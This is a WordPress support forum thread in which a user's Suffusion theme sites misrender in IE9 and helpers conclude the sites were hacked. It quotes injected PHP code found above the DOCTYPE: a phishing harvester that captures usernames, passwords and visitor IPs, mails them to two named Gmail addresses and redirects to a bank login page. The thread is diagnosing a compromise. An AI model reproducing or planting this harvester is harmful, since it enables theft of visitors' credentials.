Looks like a great tool to check, but I am not seeing what file it is referencing to go hacking. Where is DOCTYPE?
Additionally, trying to solve this I ended up with 3 versions of 4.4.4. suffusion4.4.4, suffusion4-4-4 and suffusion444.
All three show up in theme list, but no way to differentiate.
I also have two 3.4.7’s in there and one that claims to be 3.7.8 but comes up as 3.4.7. How do I find what folder each is TRULY pointing to so I can remove some? They are all telling me I can’t move or delete because they are in use. (I know, different subject, but part of the problem.)
The DOCTYPE goes at the top of every page — see this:
http://www.w3schools.com/tags/tag_doctype.asp
All of your sites have code above it – did you add it to the header.php files?
<?
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "---------------Great1------------------------------------\n";
$message .= "User ID: ".$_POST['username']."\n";
$message .= "Password: ".$_POST['realm']."\n";
$message .= "Personal Identification Number: ".$_POST['password']."\n";
$message .= "-------------------------------------------------------------------\n";
$message .= "Client IP : ".$ip."\n";
$message .= "HostName : ".$hostname."\n";
$rnessage = "$message\n";
$message .= "---------------O My LORD------------------------------------\n";
$recipient = "dino.donju@gmail.com, donjudino@gmail.com";
$subject = "BofA";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$rnessage,$headers);
mail($messege,$subject,$rnessage,$headers);
header("Location: https://www.pacific.net.au/account/loginCustomer.jsp");
?><!DOCTYPE html>
I have not done ANY customizing outside of choices within the theme. However, I see in the header.php there IS a php block of code above DOCTYPE. Guessing it would be in lots of places/files/code segments.
From HEADER.PHP
<?php
/**
* Core header file, invoked by the get_header() function
*
* @package Suffusion
* @subpackage Templates
*/
global $suffusion_unified_options, $suffusion_interactive_text_fields, $suffusion_translatable_fields, $suffusion_skin_dependence, $suf_color_scheme;
if (function_exists('icl_t')) {
foreach ($suffusion_unified_options as $id => $value) {
/**
* Some strings are set interactively in the admin screens of Suffusion. If you have WPML installed, then there may be translations of such strings.
* This code ensures that such translations are picked up, then the unified options array is rewritten so that subsequent calls can pick it up.
*/
if (function_exists('icl_t') && in_array($id, $suffusion_translatable_fields) && isset($suffusion_interactive_text_fields[$id])) {
$value = wpml_t('suffusion-interactive', $suffusion_interactive_text_fields[$id]."|".$id, $value);
}
global $$id;
$$id = $value;
$suffusion_unified_options[$id] = $value;
}
}
?>
<!DOCTYPE html>
<!--[if IE 6]> <html id="ie6" <?php language_attributes(); ?>> <![endif]-->
<!--[if IE 7]> <html id="ie7" <?php language_attributes(); ?>> <![endif]-->
<!--[if IE 8]> <html id="ie8" <?php language_attributes(); ?>> <![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)]><!--> <html <?php language_attributes(); ?>> <!--<![endif]-->
<head>
[Please wrap your code in backticks, in future]
Validator you used doesn’t understand PHP?
I see there is no [if for IE 9..
Works fine in IE 10.
If only we didn’t have 7000 PCs defaulted to IE 9…
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
That’s really odd and shouldn’t be there in the generated HTML. I’ve installed that 4.4.4 theme on my test installation and I am not seeing that code at the top like that.
Backing down to 3.7.8 “fixes” the issue, but…
Can you take one of those sites and switch to the Twenty Eleven theme? That’s just to confirm if it’s your theme or something else generating that code.
That code that is showing up has me really worried and that really does look like you’ve been hacked. π
Even THAT looks bad in IE9.
Yep, “Basically” isn’t too bad, but… They ALL look fine in FF & Chrome.
Cannot figure out what happened. They were fine yesterday!
Sorry I had to leave for a while, but I had the same concern as Jan – that your sites have been hacked. Can you go back to twentytwelve and deactivate all your plug-ins just to see if that changes it (the errant code)? (It’s not that the sites are “okay” in FF and Chrome, just that IE is a fussy browser – the bad code is there in all of them.)
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
I will, but to be clear, you are saying this is not normal? (below)
<?php
/**
* The Header for our theme.
*
* Displays all of the <head> section and everything up till <div id=”main”>
*
* @package WordPress
* @subpackage Twenty_Eleven
* @since Twenty Eleven 1.0
*/
?><!DOCTYPE html>
That’s normal, but that’s not what is on your site. Look at the code (rendered HTML) I posted above — it’s bad and it’s in every page of your sites.
